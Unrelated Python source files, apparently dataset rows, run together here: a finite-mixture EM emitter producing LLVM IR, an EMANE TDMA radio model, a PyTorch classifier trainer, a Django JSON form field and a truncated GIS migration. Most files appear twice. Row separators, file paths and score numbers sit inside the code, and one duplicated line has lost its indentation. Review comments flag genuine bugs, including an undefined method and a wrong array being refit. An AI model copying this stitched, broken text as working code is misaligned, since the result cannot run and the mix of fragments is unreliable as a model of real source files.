        post = numpy.ndarray(self.K)

        for i in xrange(self.K):
            ll = parameter[i]["p"]

            for j in xrange(len(samples)):
                ll += self.distribution.ll(parameter[i]["c"], samples[j])

            post[i] = ll

        # normalize and exponentiate
        from cargo.statistics.functions import log_plus_all

        post[:] -= log_plus_all(post)

        numpy.exp(post, post)

        return post

    @property
    def parameter_dtype(self):
        """
        Return the parameter type.
        """
        return self._parameter_dtype

    @property
    def sample_dtype(self):
        """
        Return the sample type.
        """
        return self._distribution.sample_dtype

    @property
    def prior_dtype(self):
        """
        Return the prior type.
        """
        return self._prior_dtype

    @property
    def marginal_dtype(self):
        """
        Return the marginal dtype.
        """
        return self._distribution.average_dtype

    @property
    def K(self):
        """
        The number of mixture components.
        """
        return self._K

    @property
    def distribution(self):
        """
        Return the mixture components.
        """
        return self._distribution
class FiniteMixtureEmitter(object):
    """
    Emit IR for the FiniteMixture distribution.

    Each public method (ll/ml/map/given/marginal) wraps its private
    counterpart in a qy Function.define so the body is compiled once;
    the private methods emit the actual LLVM IR.
    """

    def __init__(self, model):
        """
        Initialize.
        """
        self._model = model
        # IR emitter for the shared component distribution
        self._sub_emitter = self._model.distribution.get_emitter()

    def ll(self, parameter, sample, out):
        """
        Compute finite-mixture log-likelihood.
        """
        @Function.define(
            Type.void(),
            [parameter.data.type_, sample.data.type_, out.type_],
        )
        def finite_mixture_ll(parameter_data, sample_data, out_data):
            self._ll(
                parameter.using(parameter_data),
                sample.using(sample_data),
                out_data,
            )

            qy.return_()

        finite_mixture_ll(parameter.data, sample.data, out)

    def _ll(self, parameter, sample, out):
        """
        Compute finite-mixture log-likelihood.

        Emits log(sum_k p_k * p(sample | component_k)) as a running
        log-sum-exp accumulated in *total*.
        """
        total = qy.stack_allocate(float, -numpy.inf, "total")
        component_ll = qy.stack_allocate(float)

        @qy.for_(self._model._K)
        def _(index):
            component = parameter.at(index)

            self._sub_emitter.ll(
                StridedArray.from_typed_pointer(component.data.gep(0, 1)),
                sample,
                component_ll,
            )

            # total = log_add(total, log(p_k) + component_ll)
            log_add_double(
                total.load(),
                qy.log(component.data.gep(0, 0).load()) + component_ll.load(),
            ) \
            .store(total)

        total.load().store(out)

    def ml(self, samples, weights, out):
        """
        Emit computation of the estimated maximum-likelihood parameter.
        """
        @Function.define(
            Type.void(),
            [samples.data.type_, weights.data.type_, out.data.type_],
        )
        def finite_mixture_ml(samples_data, weights_data, out_data):
            # NOTE(review): self._ml is not defined on this class (see the
            # "XXX def _ml" marker below), so emitting this function raises
            # AttributeError -- confirm whether _ml was meant to exist.
            self._ml(
                samples.using(samples_data),
                weights.using(weights_data),
                out.using(out_data),
            )

        finite_mixture_ml(samples.data, weights.data, out.data)

    # XXX def _ml

    def map(self, prior, samples, weights, out, initializations = 16):
        """
        Emit computation of the estimated MAP parameter.
        """
        @Function.define(
            Type.void(),
            [prior.data.type_, samples.data.type_, weights.data.type_, out.data.type_],
        )
        def finite_mixture_map(prior_data, samples_data, weights_data, out_data):
            self._map(
                prior.using(prior_data),
                samples.using(samples_data),
                weights.using(weights_data),
                out.using(out_data),
                initializations,
            )

        finite_mixture_map(prior.data, samples.data, weights.data, out.data)

    def _map_initialize(self, prior, samples, weights, out, initializations):
        """
        Emit parameter initialization for EM.

        Tries *initializations* random hard assignments of samples to
        components, tracks the assignment with the best total likelihood,
        refits the components, then draws random mixture weights.
        """
        # generate a random initial component assignment
        K = self._model._K
        N = samples.shape[0]

        total = qy.stack_allocate(float)
        best_ll = qy.stack_allocate(float, -numpy.inf)
        assigns = StridedArray.heap_allocated(int, (K,))
        best_assigns = StridedArray.heap_allocated(int, (K,))

        @qy.for_(initializations)
        def _(i):
            @qy.for_(K)
            def _(k):
                # randomly assign the component
                j = qy.random_int(N)
                component = StridedArray.from_typed_pointer(out.at(k).data.gep(0, 1))

                j.store(assigns.at(k).data)

                self._sub_emitter.map(
                    prior.at(k),
                    samples.at(j).envelop(),
                    weights.at(j).envelop(),
                    component,
                )

            # compute our total likelihood
            qy.value_from_any(0.0).store(total)

            @qy.for_(N)
            def _(n):
                sample = samples.at(n)
                # stash the per-sample running sum before reusing *total*
                # as the log-sum-exp accumulator over components
                mixture_ll = total.load()

                qy.value_from_any(-numpy.inf).store(total)

                @qy.for_(K)
                def _(k):
                    component_ll = total.load()

                    self._sub_emitter.ll(
                        StridedArray.from_typed_pointer(out.at(k).data.gep(0, 1)),
                        sample,
                        total,
                    )

                    log_add_double(component_ll, total.load()).store(total)

                (mixture_ll + total.load()).store(total)

            # best observed so far?
            @qy.if_(total.load() >= best_ll.load())
            def _():
                total.load().store(best_ll)

                @qy.for_(K)
                def _(k):
                    assigns.at(k).data.load().store(best_assigns.at(k).data)

        # recompute the best observed assignment
        # NOTE(review): this refit reads *assigns* (the last initialization's
        # assignment), not *best_assigns* -- confirm which was intended.
        @qy.for_(K)
        def _(k):
            j = assigns.at(k).data.load()

            self._sub_emitter.ml(
                samples.at(j).envelop(),
                weights.at(j).envelop(),
                StridedArray.from_typed_pointer(out.at(k).data.gep(0, 1)),
            )

        qy.heap_free(assigns.data)
        qy.heap_free(best_assigns.data)

        # generate random initial component weights
        # NOTE(review): *total* is not reset to zero before accumulating the
        # random weights here; it still holds a likelihood value -- confirm.
        @qy.for_(K)
        def _(k):
            r = qy.random()

            r.store(out.at(k).data.gep(0, 0))

            (total.load() + r).store(total)

        @qy.for_(K)
        def _(k):
            p = out.at(k).data.gep(0, 0)

            (p.load() / total.load()).store(p)

    def _map(self, prior, samples, weights, out, initializations):
        """
        Emit computation of the estimated maximum-likelihood parameter.

        Standard EM: E-step fills a K-by-N responsibility matrix, M-step
        refits components and weights, iterating up to the model's
        configured iteration cap with an L1 termination test.
        """
        # mise en place
        K = self._model._K
        N = samples.shape[0]

        # generate some initial parameters
        self._map_initialize(prior, samples, weights, out, initializations)

        # run EM until convergence
        total = qy.stack_allocate(float)
        component_ll = qy.stack_allocate(float)
        # double-buffered responsibility matrices, swapped each iteration
        this_r_KN = StridedArray.heap_allocated(float, (K, N))
        last_r_KN = StridedArray.heap_allocated(float, (K, N))

        this_r_KN_data = Variable.set_to(this_r_KN.data)
        last_r_KN_data = Variable.set_to(last_r_KN.data)

        @qy.for_(self._model._iterations)
        def _(i):
            # compute responsibilities
            r_KN = this_r_KN.using(this_r_KN_data.value)

            @qy.for_(N)
            def _(n):
                sample = samples.at(n)

                qy.value_from_any(-numpy.inf).store(total)

                @qy.for_(K)
                def _(k):
                    responsibility = r_KN.at(k, n).data

                    self._sub_emitter.ll(
                        StridedArray.from_typed_pointer(out.at(k).data.gep(0, 1)),
                        StridedArray.from_typed_pointer(sample.data),
                        responsibility,
                    )

                    log_add_double(total.load(), responsibility.load()).store(total)

                total_value = total.load()

                @qy.if_else(total_value == -numpy.inf)
                def _(then):
                    if then:
                        # degenerate sample: fall back to uniform responsibility
                        @qy.for_(K)
                        def _(k):
                            qy.value_from_any(1.0 / K).store(r_KN.at(k, n).data)
                    else:
                        # normalize in log space, then exponentiate
                        @qy.for_(K)
                        def _(k):
                            responsibility = r_KN.at(k, n).data

                            qy.exp(responsibility.load() - total_value).store(responsibility)

            # estimate new mixture and component parameters
            @qy.for_(K)
            def _(k):
                component = out.at(k).data

                self._sub_emitter.map(
                    prior.at(k),
                    samples,
                    r_KN.at(k),
                    StridedArray.from_typed_pointer(component.gep(0, 1)),
                )

                qy.value_from_any(0.0).store(total)

                @qy.for_(N)
                def _(n):
                    (total.load() + r_KN.at(k, n).data.load()).store(total)

                # new mixture weight = mean responsibility of component k
                (total.load() / float(N)).store(component.gep(0, 0))

            # check for termination
            last_r_KN = this_r_KN.using(last_r_KN_data.value)

            @qy.if_(i > 0)
            def _():
                # L1 distance between successive responsibility matrices
                # NOTE(review): threshold is hard-coded to 1e-12 rather than
                # using self._model._convergence -- confirm intent.
                qy.value_from_any(0.0).store(total)

                @qy.for_(K)
                def _(k):
                    @qy.for_(N)
                    def _(n):
                        delta = r_KN.at(k, n).data.load() - last_r_KN.at(k, n).data.load()

                        (total.load() + abs(delta)).store(total)

                @qy.if_(total.load() < 1e-12)
                def _():
                    qy.break_()

            total_delta = total.load()

            # swap the responsibility matrices
            temp_r_KN_data_value = this_r_KN_data.value

            this_r_KN_data.set(last_r_KN_data.value)
            last_r_KN_data.set(temp_r_KN_data_value)

            # compute the ll at this step
            @qy.for_(N)
            def _(n):
                sample = samples.at(n)
                total_ll = total.load()

                qy.value_from_any(-numpy.inf).store(total)

                @qy.for_(K)
                def _(k):
                    self._sub_emitter.ll(
                        StridedArray.from_typed_pointer(out.at(k).data.gep(0, 1)),
                        StridedArray.from_typed_pointer(sample.data),
                        component_ll,
                    )

                    log_add_double(
                        total.load(),
                        qy.log(out.at(k).data.gep(0, 0).load()) + component_ll.load(),
                    ) \
                    .store(total)

                (total_ll + total.load()).store(total)

            total_ll = total.load()

            # be informative
            qy.py_printf("after EM step %i: delta %s; ll %s\n", i, total_delta, total_ll)

        # clean up
        qy.heap_free(this_r_KN.data)
        qy.heap_free(last_r_KN.data)

        qy.return_()

    def given(self, parameter, samples, out):
        """
        Compute the conditional distribution.
        """
        @Function.define(
            Type.void(),
            [parameter.data.type_, samples.data.type_, out.data.type_],
        )
        def finite_mixture_given(parameter_data, samples_data, out_data):
            self._given(
                parameter.using(parameter_data),
                samples.using(samples_data),
                out.using(out_data),
            )

            qy.return_()

        finite_mixture_given(parameter.data, samples.data, out.data)

    def _given(self, parameter, samples, out):
        """
        Compute the conditional distribution.

        Updates the mixture weights with each sample's likelihood (Bayes
        rule in log space), then conditions every component on the samples.
        """
        # mise en place
        K = self._model._K
        N = samples.shape[0]

        # compute posterior mixture parameters
        total = qy.stack_allocate(float, -numpy.inf)

        @qy.for_(K)
        def _(k):
            prior_pi = parameter.at(k).data.gep(0, 0)
            prior_parameter = parameter.at(k).data.gep(0, 1)
            posterior_pi = out.at(k).data.gep(0, 0)

            qy.log(prior_pi.load()).store(posterior_pi)

            @qy.for_(N)
            def _(n):
                current_pi = posterior_pi.load()

                self._sub_emitter.ll(
                    StridedArray.from_typed_pointer(prior_parameter),
                    samples.at(n),
                    posterior_pi,
                )

                (current_pi + posterior_pi.load()).store(posterior_pi)

            log_add_double(total.load(), posterior_pi.load()).store(total)

        total_value = total.load()

        @qy.for_(K)
        def _(k):
            posterior_pi = out.at(k).data.gep(0, 0)
            normalized_pi = posterior_pi.load() - total_value

            qy.exp(normalized_pi).store(posterior_pi)

        # compute posterior component parameters
        @qy.for_(K)
        def _(k):
            prior_parameter = parameter.at(k).data.gep(0, 1)
            posterior_parameter = out.at(k).data.gep(0, 1)

            self._sub_emitter.given(
                StridedArray.from_typed_pointer(prior_parameter),
                samples,
                StridedArray.from_typed_pointer(posterior_parameter),
            )

    def marginal(self, parameter, out):
        """
        Compute the marginal distribution.
        """
        @Function.define(
            Type.void(),
            [parameter.data.type_, out.data.type_],
        )
        def finite_mixture_marginal(parameter_data, out_data):
            self._marginal(
                parameter.using(parameter_data),
                out.using(out_data),
            )

        finite_mixture_marginal(parameter.data, out.data)

    def _marginal(self, parameter, out):
        """
        Compute the marginal distribution.
        """
        # averages the component parameters, weighted by mixture weight "p"
        self._sub_emitter.average(
            parameter.extract(0, 0),
            parameter.extract(0, 1),
            out,
        )
        qy.return_()
# quality_prob: 0.677261  learning_prob: 0.412619
import logging
from pathlib import Path
from typing import Set
from core import constants, utils
from core.config import ConfigString
from core.emane import emanemodel
from core.emane.nodes import EmaneNet
from core.nodes.interface import CoreInterface
logger = logging.getLogger(__name__)
class EmaneTdmaModel(emanemodel.EmaneModel):
    """EMANE TDMA event-scheduler radio model with a CORE-managed schedule file."""

    # model name
    name: str = "emane_tdma"

    # mac configuration
    mac_library: str = "tdmaeventschedulerradiomodel"
    mac_xml: str = "tdmaeventschedulerradiomodel.xml"

    # add custom schedule options and ignore it when writing emane xml
    schedule_name: str = "schedule"
    default_schedule: Path = (
        constants.CORE_DATA_DIR / "examples" / "tdma" / "schedule.xml"
    )
    config_ignore: Set[str] = {schedule_name}

    @classmethod
    def load(cls, emane_prefix: Path) -> None:
        """Register MAC defaults and prepend the schedule-file config option.

        :param emane_prefix: installation prefix containing the EMANE XML models
        """
        cls.mac_defaults["pcrcurveuri"] = str(
            emane_prefix
            / "share/emane/xml/models/mac/tdmaeventscheduler/tdmabasemodelpcr.xml"
        )
        super().load(emane_prefix)
        config_item = ConfigString(
            id=cls.schedule_name,
            default=str(cls.default_schedule),
            label="TDMA schedule file (core)",
        )
        # schedule option is placed first in the MAC configuration list
        cls.mac_config.insert(0, config_item)

    def post_startup(self, iface: CoreInterface) -> None:
        """Push the configured TDMA schedule to the NEM attached to *iface*.

        Logs and returns early when the schedule file or NEM cannot be found.
        """
        # get configured schedule
        emane_net = self.session.get_node(self.id, EmaneNet)
        config = self.session.emane.get_iface_config(emane_net, iface)
        schedule = Path(config[self.schedule_name])
        if not schedule.is_file():
            logger.error("ignoring invalid tdma schedule: %s", schedule)
            return
        # initiate tdma schedule
        nem_id = self.session.emane.get_nem_id(iface)
        if not nem_id:
            logger.error("could not find nem for interface")
            return
        service = self.session.emane.nem_service.get(nem_id)
        if service:
            device = service.device
            logger.info(
                "setting up tdma schedule: schedule(%s) device(%s)", schedule, device
            )
            utils.cmd(f"emaneevent-tdmaschedule -i {device} {schedule}")
# --- file: daemon/core/emane/models/tdma.py ---
import logging
from pathlib import Path
from typing import Set
from core import constants, utils
from core.config import ConfigString
from core.emane import emanemodel
from core.emane.nodes import EmaneNet
from core.nodes.interface import CoreInterface
logger = logging.getLogger(__name__)
class EmaneTdmaModel(emanemodel.EmaneModel):
    """EMANE TDMA event-scheduler radio model with a CORE-managed schedule file."""

    # model name
    name: str = "emane_tdma"

    # mac configuration
    mac_library: str = "tdmaeventschedulerradiomodel"
    mac_xml: str = "tdmaeventschedulerradiomodel.xml"

    # add custom schedule options and ignore it when writing emane xml
    schedule_name: str = "schedule"
    default_schedule: Path = (
        constants.CORE_DATA_DIR / "examples" / "tdma" / "schedule.xml"
    )
    config_ignore: Set[str] = {schedule_name}

    @classmethod
    def load(cls, emane_prefix: Path) -> None:
        """Register MAC defaults and prepend the schedule-file config option.

        :param emane_prefix: installation prefix containing the EMANE XML models
        """
        cls.mac_defaults["pcrcurveuri"] = str(
            emane_prefix
            / "share/emane/xml/models/mac/tdmaeventscheduler/tdmabasemodelpcr.xml"
        )
        super().load(emane_prefix)
        config_item = ConfigString(
            id=cls.schedule_name,
            default=str(cls.default_schedule),
            label="TDMA schedule file (core)",
        )
        # schedule option is placed first in the MAC configuration list
        cls.mac_config.insert(0, config_item)

    def post_startup(self, iface: CoreInterface) -> None:
        """Push the configured TDMA schedule to the NEM attached to *iface*.

        Logs and returns early when the schedule file or NEM cannot be found.
        """
        # get configured schedule
        emane_net = self.session.get_node(self.id, EmaneNet)
        config = self.session.emane.get_iface_config(emane_net, iface)
        schedule = Path(config[self.schedule_name])
        if not schedule.is_file():
            logger.error("ignoring invalid tdma schedule: %s", schedule)
            return
        # initiate tdma schedule
        nem_id = self.session.emane.get_nem_id(iface)
        if not nem_id:
            logger.error("could not find nem for interface")
            return
        service = self.session.emane.nem_service.get(nem_id)
        if service:
            device = service.device
            logger.info(
                "setting up tdma schedule: schedule(%s) device(%s)", schedule, device
            )
utils.cmd(f"emaneevent-tdmaschedule -i {device} {schedule}") | 0.706697 | 0.105395 |
import os
import time
from tqdm import tqdm
import torch
import torch.nn as nn
from metrics.loss_metric import LossMetric
from metrics.accuracy_metric import AccuracyMetric
from metrics.classification_learning_curves import ClassificationLearningCurves
class ClassifierTrainer:
    """Supervised training loop for an image classifier (Adam + cosine LR)."""

    def __init__(self, device, model, training_dataset, validation_dataset, output_path='', epoch_count=10,
                 learning_rate=0.01, batch_size=128):
        self._device = device
        self._output_path = output_path
        os.makedirs(self._output_path, exist_ok=True)
        self._epoch_count = epoch_count
        self._batch_size = batch_size
        # wrap in DataParallel when several GPUs are available
        if device.type == 'cuda' and torch.cuda.device_count() > 1:
            print("DataParallel - GPU count:", torch.cuda.device_count())
            model = nn.DataParallel(model)
        self._model = model.to(device)
        self._optimizer = torch.optim.Adam(self._model.parameters(), lr=learning_rate)
        # cosine annealing schedule spanning the full number of epochs
        self._scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(self._optimizer, epoch_count)
        self._criterion = nn.CrossEntropyLoss()
        self._training_dataset_loader = torch.utils.data.DataLoader(training_dataset,
                                                                    batch_size=batch_size,
                                                                    shuffle=True,
                                                                    num_workers=4)
        self._validation_dataset_loader = torch.utils.data.DataLoader(validation_dataset,
                                                                      batch_size=batch_size,
                                                                      shuffle=True,
                                                                      num_workers=4)
        self._training_loss_metric = LossMetric()
        self._training_accuracy_metric = AccuracyMetric()
        self._validation_loss_metric = LossMetric()
        self._validation_accuracy_metric = AccuracyMetric()
        self._learning_curves = ClassificationLearningCurves()

    def train(self):
        """Run the full train/validate cycle, saving curves and a checkpoint per epoch."""
        self._learning_curves.clear()
        for epoch in range(self._epoch_count):
            print('Training - Epoch [{}/{}]'.format(epoch + 1, self._epoch_count))
            time.sleep(0.1)  # To prevent tqdm glitches
            self._train_one_epoch()
            print('\nValidation - Epoch [{}/{}]'.format(epoch + 1, self._epoch_count))
            time.sleep(0.1)  # To prevent tqdm glitches
            self._validate()
            self._scheduler.step()
            self._print_performances()
            self._save_learning_curves()
            self._save_states(epoch + 1)

    def _train_one_epoch(self):
        # one optimization pass over the training loader
        self._training_loss_metric.clear()
        self._training_accuracy_metric.clear()
        self._model.train()
        for image, target in tqdm(self._training_dataset_loader):
            predicted_class_scores = self._model(image.to(self._device))
            target = target.to(self._device)
            loss = self._criterion(predicted_class_scores, target)
            self._optimizer.zero_grad()
            loss.backward()
            self._optimizer.step()
            self._training_loss_metric.add(loss.item())
            self._training_accuracy_metric.add(predicted_class_scores, target)

    def _validate(self):
        # NOTE(review): no torch.no_grad() here, so gradients are tracked
        # during validation — confirm this is intended (it wastes memory)
        self._validation_loss_metric.clear()
        self._validation_accuracy_metric.clear()
        self._model.eval()
        for image, target in tqdm(self._validation_dataset_loader):
            predicted_class_scores = self._model(image.to(self._device))
            target = target.to(self._device)
            loss = self._criterion(predicted_class_scores, target)
            self._validation_loss_metric.add(loss.item())
            self._validation_accuracy_metric.add(predicted_class_scores, target)

    def _print_performances(self):
        # epoch summary of both training and validation metrics
        print('\nTraining : Loss={}, Accuracy={}'.format(self._training_loss_metric.get_loss(),
                                                         self._training_accuracy_metric.get_accuracy()))
        print('Validation : Loss={}, Accuracy={}\n'.format(self._validation_loss_metric.get_loss(),
                                                           self._validation_accuracy_metric.get_accuracy()))

    def _save_learning_curves(self):
        # append this epoch's metrics and refresh the saved figure
        self._learning_curves.add_training_loss_value(self._training_loss_metric.get_loss())
        self._learning_curves.add_training_accuracy_value(self._training_accuracy_metric.get_accuracy())
        self._learning_curves.add_validation_loss_value(self._validation_loss_metric.get_loss())
        self._learning_curves.add_validation_accuracy_value(self._validation_accuracy_metric.get_accuracy())
        self._learning_curves.save_figure(os.path.join(self._output_path, 'learning_curves.png'))

    def _save_states(self, epoch):
        # checkpoint the (possibly DataParallel-wrapped) model weights
        # NOTE(review): trailing "| ... |" text below is dataset-row residue, not code
        torch.save(self._model.state_dict(),
                   os.path.join(self._output_path, 'model_checkpoint_epoch_{}.pth'.format(epoch))) | classifier_trainer.py | import os
import time
from tqdm import tqdm
import torch
import torch.nn as nn
from metrics.loss_metric import LossMetric
from metrics.accuracy_metric import AccuracyMetric
from metrics.classification_learning_curves import ClassificationLearningCurves
class ClassifierTrainer:
    """Supervised training loop for an image classifier (Adam + cosine LR)."""

    def __init__(self, device, model, training_dataset, validation_dataset, output_path='', epoch_count=10,
                 learning_rate=0.01, batch_size=128):
        self._device = device
        self._output_path = output_path
        os.makedirs(self._output_path, exist_ok=True)
        self._epoch_count = epoch_count
        self._batch_size = batch_size
        # wrap in DataParallel when several GPUs are available
        if device.type == 'cuda' and torch.cuda.device_count() > 1:
            print("DataParallel - GPU count:", torch.cuda.device_count())
            model = nn.DataParallel(model)
        self._model = model.to(device)
        self._optimizer = torch.optim.Adam(self._model.parameters(), lr=learning_rate)
        # cosine annealing schedule spanning the full number of epochs
        self._scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(self._optimizer, epoch_count)
        self._criterion = nn.CrossEntropyLoss()
        self._training_dataset_loader = torch.utils.data.DataLoader(training_dataset,
                                                                    batch_size=batch_size,
                                                                    shuffle=True,
                                                                    num_workers=4)
        self._validation_dataset_loader = torch.utils.data.DataLoader(validation_dataset,
                                                                      batch_size=batch_size,
                                                                      shuffle=True,
                                                                      num_workers=4)
        self._training_loss_metric = LossMetric()
        self._training_accuracy_metric = AccuracyMetric()
        self._validation_loss_metric = LossMetric()
        self._validation_accuracy_metric = AccuracyMetric()
        self._learning_curves = ClassificationLearningCurves()

    def train(self):
        """Run the full train/validate cycle, saving curves and a checkpoint per epoch."""
        self._learning_curves.clear()
        for epoch in range(self._epoch_count):
            print('Training - Epoch [{}/{}]'.format(epoch + 1, self._epoch_count))
            time.sleep(0.1)  # To prevent tqdm glitches
            self._train_one_epoch()
            print('\nValidation - Epoch [{}/{}]'.format(epoch + 1, self._epoch_count))
            time.sleep(0.1)  # To prevent tqdm glitches
            self._validate()
            self._scheduler.step()
            self._print_performances()
            self._save_learning_curves()
            self._save_states(epoch + 1)

    def _train_one_epoch(self):
        # one optimization pass over the training loader
        self._training_loss_metric.clear()
        self._training_accuracy_metric.clear()
        self._model.train()
        for image, target in tqdm(self._training_dataset_loader):
            predicted_class_scores = self._model(image.to(self._device))
            target = target.to(self._device)
            loss = self._criterion(predicted_class_scores, target)
            self._optimizer.zero_grad()
            loss.backward()
            self._optimizer.step()
            self._training_loss_metric.add(loss.item())
            self._training_accuracy_metric.add(predicted_class_scores, target)

    def _validate(self):
        # NOTE(review): no torch.no_grad() here, so gradients are tracked
        # during validation — confirm this is intended (it wastes memory)
        self._validation_loss_metric.clear()
        self._validation_accuracy_metric.clear()
        self._model.eval()
        for image, target in tqdm(self._validation_dataset_loader):
            predicted_class_scores = self._model(image.to(self._device))
            target = target.to(self._device)
            loss = self._criterion(predicted_class_scores, target)
            self._validation_loss_metric.add(loss.item())
            self._validation_accuracy_metric.add(predicted_class_scores, target)

    def _print_performances(self):
        # epoch summary of both training and validation metrics
        print('\nTraining : Loss={}, Accuracy={}'.format(self._training_loss_metric.get_loss(),
                                                         self._training_accuracy_metric.get_accuracy()))
        print('Validation : Loss={}, Accuracy={}\n'.format(self._validation_loss_metric.get_loss(),
                                                           self._validation_accuracy_metric.get_accuracy()))

    def _save_learning_curves(self):
        # append this epoch's metrics and refresh the saved figure
        self._learning_curves.add_training_loss_value(self._training_loss_metric.get_loss())
        self._learning_curves.add_training_accuracy_value(self._training_accuracy_metric.get_accuracy())
        self._learning_curves.add_validation_loss_value(self._validation_loss_metric.get_loss())
        self._learning_curves.add_validation_accuracy_value(self._validation_accuracy_metric.get_accuracy())
        self._learning_curves.save_figure(os.path.join(self._output_path, 'learning_curves.png'))

    def _save_states(self, epoch):
        # checkpoint the (possibly DataParallel-wrapped) model weights
        # NOTE(review): trailing "| ... |" text below is dataset-row residue, not code
        torch.save(self._model.state_dict(),
                   os.path.join(self._output_path, 'model_checkpoint_epoch_{}.pth'.format(epoch))) | 0.825238 | 0.212865 |
import django
from django.forms import MultiValueField, CharField
from attributesjsonfield.widgets import AttributesJSONWidget
class AttributesJSONField(MultiValueField):
    """Form field rendering a list of attribute definitions as one JSON value.

    `attributes` items are either plain field-name strings or dicts with the
    keys: field (required), verbose_name, required, choices, default, data_type.
    """

    widget = AttributesJSONWidget

    def __init__(self, *args, attributes=None, require_all_fields=False, **kwargs):
        self.attributes = attributes
        # normalized attribute descriptors consumed by the widget and compress()
        self.clean_attributes = []
        if self.attributes:
            for attr in self.attributes:
                is_dict = type(attr) == dict
                field = attr["field"] if is_dict else attr
                if is_dict:
                    label = attr.get("verbose_name", field)
                    required = attr.get("required", True)
                else:
                    # bare string: the name doubles as the label, always required
                    label = field
                    required = True
                self.clean_attributes.append(
                    {
                        "field": field,
                        "label": label,
                        "name": field,
                        "choices": attr.get("choices") if is_dict else None,
                        "required": required,
                        "default": attr.get("default") if is_dict else None,
                        "data_type": attr.get("data_type") if is_dict else None,
                    }
                )
        else:
            # NOTE(review): this sets clean_attributes to None, yet the
            # comprehension below iterates it — verify callers always pass a
            # non-empty `attributes`, otherwise this raises TypeError
            self.clean_attributes = None
        fields = [
            CharField(
                label=attr["label"],
                initial=attr.get("default"),
                required=attr["required"],
            )
            for attr in self.clean_attributes
        ]
        self.widget = AttributesJSONWidget(attributes_json=self.clean_attributes)
        if django.VERSION >= (3, 1):
            # MultiValueField does not receive as kwargs the encoder or decoder
            # NOTE(review): pop() without a default raises KeyError when the
            # caller did not supply encoder/decoder — confirm all call sites do
            kwargs.pop("encoder")
            kwargs.pop("decoder")
        super().__init__(fields=fields, require_all_fields=require_all_fields, **kwargs)

    def compress(self, data_list):
        """Combine the per-attribute values into a single {name: value} dict."""
        if data_list:
            data = {}
            for i, attribute in enumerate(self.clean_attributes):
                data[attribute["name"]] = data_list[i]
            return data
        # NOTE(review): trailing "| ... |" text below is dataset-row residue, not code
        return None | attributesjsonfield/forms/fields.py | import django
from django.forms import MultiValueField, CharField
from attributesjsonfield.widgets import AttributesJSONWidget
class AttributesJSONField(MultiValueField):
    """Form field rendering a list of attribute definitions as one JSON value.

    `attributes` items are either plain field-name strings or dicts with the
    keys: field (required), verbose_name, required, choices, default, data_type.
    """

    widget = AttributesJSONWidget

    def __init__(self, *args, attributes=None, require_all_fields=False, **kwargs):
        self.attributes = attributes
        # normalized attribute descriptors consumed by the widget and compress()
        self.clean_attributes = []
        if self.attributes:
            for attr in self.attributes:
                is_dict = type(attr) == dict
                field = attr["field"] if is_dict else attr
                if is_dict:
                    label = attr.get("verbose_name", field)
                    required = attr.get("required", True)
                else:
                    # bare string: the name doubles as the label, always required
                    label = field
                    required = True
                self.clean_attributes.append(
                    {
                        "field": field,
                        "label": label,
                        "name": field,
                        "choices": attr.get("choices") if is_dict else None,
                        "required": required,
                        "default": attr.get("default") if is_dict else None,
                        "data_type": attr.get("data_type") if is_dict else None,
                    }
                )
        else:
            # NOTE(review): this sets clean_attributes to None, yet the
            # comprehension below iterates it — verify callers always pass a
            # non-empty `attributes`, otherwise this raises TypeError
            self.clean_attributes = None
        fields = [
            CharField(
                label=attr["label"],
                initial=attr.get("default"),
                required=attr["required"],
            )
            for attr in self.clean_attributes
        ]
        self.widget = AttributesJSONWidget(attributes_json=self.clean_attributes)
        if django.VERSION >= (3, 1):
            # MultiValueField does not receive as kwargs the encoder or decoder
            # NOTE(review): pop() without a default raises KeyError when the
            # caller did not supply encoder/decoder — confirm all call sites do
            kwargs.pop("encoder")
            kwargs.pop("decoder")
        super().__init__(fields=fields, require_all_fields=require_all_fields, **kwargs)

    def compress(self, data_list):
        """Combine the per-attribute values into a single {name: value} dict."""
        if data_list:
            data = {}
            for i, attribute in enumerate(self.clean_attributes):
                data[attribute["name"]] = data_list[i]
            return data
        # NOTE(review): trailing "| ... |" text below is dataset-row residue, not code
        return None | 0.402862 | 0.109206 |
from __future__ import unicode_literals
import django.contrib.gis.db.models.fields
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema: Chair and Tree point features plus a TreeType lookup table."""

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Chair',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('gisId', models.IntegerField()),
                # geography=True stores real lat/long (WGS84, srid 4326) points
                ('longLat', django.contrib.gis.db.models.fields.PointField(geography=True, srid=4326)),
            ],
        ),
        migrations.CreateModel(
            name='Tree',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('comId', models.IntegerField()),
                ('yearPlanted', models.IntegerField(null=True)),
                ('longLat', django.contrib.gis.db.models.fields.PointField(geography=True, srid=4326)),
            ],
        ),
        migrations.CreateModel(
            name='TreeType',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('commonName', models.CharField(max_length=50)),
                ('scientificName', models.CharField(max_length=50)),
                ('genus', models.CharField(max_length=50)),
                ('family', models.CharField(max_length=50)),
                ('scarcity', models.IntegerField()),
                ('license', models.CharField(max_length=100, null=True)),
                ('artist', models.TextField(max_length=1024, null=True)),
                ('imageUrl', models.TextField(max_length=1024, null=True)),
                ('description', models.TextField(max_length=1024, null=True)),
            ],
        ),
        # FK added after both models exist so TreeType is created first
        migrations.AddField(
            model_name='tree',
            name='treeType',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='trees.TreeType'),
        ),
        # NOTE(review): trailing "| ... |" text below is dataset-row residue, not code
    ] | server/trees/migrations/0001_initial.py | from __future__ import unicode_literals
import django.contrib.gis.db.models.fields
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema: Chair and Tree point features plus a TreeType lookup table."""

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Chair',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('gisId', models.IntegerField()),
                # geography=True stores real lat/long (WGS84, srid 4326) points
                ('longLat', django.contrib.gis.db.models.fields.PointField(geography=True, srid=4326)),
            ],
        ),
        migrations.CreateModel(
            name='Tree',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('comId', models.IntegerField()),
                ('yearPlanted', models.IntegerField(null=True)),
